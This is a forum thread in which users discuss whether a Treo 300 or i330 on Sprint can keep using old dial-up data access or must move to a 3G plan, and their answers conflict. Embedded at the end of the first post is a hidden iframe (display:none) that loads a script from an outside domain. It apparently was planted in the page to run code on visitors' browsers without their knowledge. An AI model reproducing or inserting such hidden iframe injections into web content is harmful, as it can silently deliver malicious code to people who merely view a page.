+ Reply to Thread

3g or not to 3g (do I really have to)? or is that not really the question?

Let's say I get a Treo 300 or a i-330. Do I have to use the 3g service? Can I just continue to use the same dial-in access like I currently use?

Thanks,
    Gary

(Actually it seems like if I can, they'd be better off offering me a service that's a low-end 3g. It might be better than tying up a phone circuit to just give me 14.4 data). And it'd probably be faster on for me!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

"work-permit' called and said he thought you could but the rep was not totally sure. IMO,i dont think you can do that with a new 3G phone. it would not make sense as far as sprint is concenred.

we have been dicussing this on another thread. the best bet is to call sprints CS yourself and ask them flatout... of course it wil be a toss up if you get someone 'in the know' or not... id call twice to be sure...

bwh
    I have been told that, on Verizon, you can access digital services when the "Express Network" is not available. That would indicate that you can access via "phone service" with Sprint. Since all of us I300 owners are still accessing through "phone service,"this would make sense. There may need to be set-up or preference changes.

Originally posted by bwh
    I have been told that, on Verizon, you can access digital services when the "Express Network" is not available. That would indicate that you can access via "phone service" with Sprint. Since all of us I300 owners are still accessing through "phone service,"this would make sense. There may need to be set-up or preference changes.
    No - the only way you can access DATA on your new 3g phone is to go to a 3g plan. If you want to only have voice, you can stay with your old plan, but you will not have data services.

Administrator

Arrow

further, verizon can do this since their network is not totally 3g.. they HAVE to allow you acces to the old 2.5g network. but im guessing they will eventually have to force new 3g customers to jump on the 3g bandwagon once their whole network is 3g ready...

I sprint rep at Best Buy (he had the shirt on!) and he said I could do it the old way. He also acted like 2MB of data was a lot! (I don't)

So what kind of phone is the extended care plan going to give me when they run out of i300's? I don't want 3g prices.

Gary